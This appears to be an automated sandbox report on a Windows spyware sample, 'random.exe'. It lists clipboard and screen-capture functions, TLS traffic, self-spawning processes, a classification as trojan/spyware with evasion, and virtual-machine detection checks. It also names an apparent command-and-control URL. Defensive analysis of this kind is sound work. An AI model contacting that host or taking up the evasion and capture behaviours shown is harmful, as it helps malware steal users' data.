        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/apik
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00437A60
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00437A60
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00437C10
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043D0D03_2_0043D0D0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040E16E3_2_0040E16E
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00408A603_2_00408A60
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004442E03_2_004442E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00421B303_2_00421B30
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00418BA23_2_00418BA2
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00444C203_2_00444C20
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043CE903_2_0043CE90
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004287503_2_00428750
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004257133_2_00425713
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042F7163_2_0042F716
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004378503_2_00437850
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041906A3_2_0041906A
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004260103_2_00426010
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004438E03_2_004438E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004180F03_2_004180F0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004438F93_2_004438F9
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004438FB3_2_004438FB
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004278853_2_00427885
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041D8B03_2_0041D8B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004069503_2_00406950
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004449503_2_00444950
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040D1723_2_0040D172
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043210B3_2_0043210B
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004039103_2_00403910
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004299173_2_00429917
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004061203_2_00406120
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040B92C3_2_0040B92C
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042F1C13_2_0042F1C1
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004239EB3_2_004239EB
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004211803_2_00421180
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041618C3_2_0041618C
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043099F3_2_0043099F
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041F9A03_2_0041F9A0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041D1B03_2_0041D1B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042E9B03_2_0042E9B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041BA523_2_0041BA52
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043025E3_2_0043025E
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042621B3_2_0042621B
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042BA203_2_0042BA20
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004172223_2_00417222
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00443A303_2_00443A30
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004042C03_2_004042C0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00443AC03_2_00443AC0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004302CD3_2_004302CD
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040F2D03_2_0040F2D0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0040B2803_2_0040B280
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004352B03_2_004352B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00402B403_2_00402B40
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00443B603_2_00443B60
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00409B703_2_00409B70
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004223703_2_00422370
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00429B7B3_2_00429B7B
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042FB7D3_2_0042FB7D
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00405B003_2_00405B00
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00440B003_2_00440B00
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00428B103_2_00428B10
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00419B303_2_00419B30
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00411BDE3_2_00411BDE
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004123EC3_2_004123EC
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00428C623_2_00428C62
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043C4603_2_0043C460
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043B4103_2_0043B410
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00441C263_2_00441C26
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004064C03_2_004064C0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042F4E13_2_0042F4E1
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004324EE3_2_004324EE
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041D4A03_2_0041D4A0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00408D103_2_00408D10
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043E5203_2_0043E520
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00442DCA3_2_00442DCA
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00415DD83_2_00415DD8
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00425DA03_2_00425DA0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004085B03_2_004085B0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004096603_2_00409660
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00404E203_2_00404E20
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043C6C03_2_0043C6C0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043E6E03_2_0043E6E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004186E53_2_004186E5
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004446803_2_00444680
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0041DE903_2_0041DE90
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043DF603_2_0043DF60
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00429F7C3_2_00429F7C
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004337073_2_00433707
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00402F103_2_00402F10
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004077303_2_00407730
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00427FC03_2_00427FC0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004437D03_2_004437D0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00433FDF3_2_00433FDF
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004127E03_2_004127E0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042A7F03_2_0042A7F0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00434FF03_2_00434FF0
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0042AF923_2_0042AF92
        Source: C:\Users\user\Desktop\random.exeCode function: String function: 00408280 appears 47 times
        Source: C:\Users\user\Desktop\random.exeCode function: String function: 00414C20 appears 145 times
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140
        Source: random.exe, 00000000.00000000.1655196760.0000000000B98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs random.exe
        Source: random.exe, 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs random.exe
        Source: random.exe, 00000000.00000002.1783439398.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs random.exe
        Source: random.exeBinary or memory string: OriginalFilenameHandler.exe0 vs random.exe
        Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: random.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003366411102483
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@1/1
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043D0D0
        Source: C:\Users\user\Desktop\random.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6732
        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6e4044c3-0b0f-4d85-b4b8-3e8de7ffdb6eJump to behavior
        Source: random.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: random.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: random.exeReversingLabs: Detection: 65%
        Source: random.exeVirustotal: Detection: 76%
        Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\user\Desktop\random.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"Jump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"Jump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: Handler.pdbxa source: random.exe
        Source: Binary string: System.Windows.Forms.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.Windows.Forms.pdb(E source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.pdb) source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: Handler.pdb source: random.exe, WERD1D7.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: Handler.pdba source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: random.exeStatic PE information: 0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_004499A1 push esp; ret 3_2_004499A2
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_0044AAD0 push ecx; retn 0041h3_2_0044AAD5
        Source: C:\Users\user\Desktop\random.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\random.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\random.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\random.exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\random.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\random.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\random.exe TID: 7060Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: Amcache.hve.6.drBinary or memory string: VMware
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000003.00000002.1796969468.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
